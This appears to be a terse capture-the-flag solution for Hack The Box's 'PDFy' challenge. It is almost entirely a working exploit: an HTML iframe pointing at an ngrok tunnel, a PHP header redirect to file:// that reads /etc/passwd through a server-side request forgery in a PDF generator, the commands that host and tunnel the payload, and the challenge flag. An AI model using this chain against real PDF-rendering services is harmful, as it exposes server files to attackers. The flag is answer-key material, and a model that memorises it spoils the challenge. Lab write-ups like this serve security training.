๐๏ธPDFy
https://app.hackthebox.com/challenges/PDFy
Last updated
https://app.hackthebox.com/challenges/PDFy
Last updated
<!DOCTYPE html>
<body>
<iframe src="http://0.tcp.eu.ngrok.io:15500/flag.php?x=/etc/passwd" style="height:800px;width:100%"></iframe>
</body>
</html><?php header('location:file://'.$_REQUEST['x']); ?>php -S 127.0.0.1:8000 ngrok tcp 127.0.0.1:8000HTB{pdF_g3n3r4t1on_g03s_brrr!}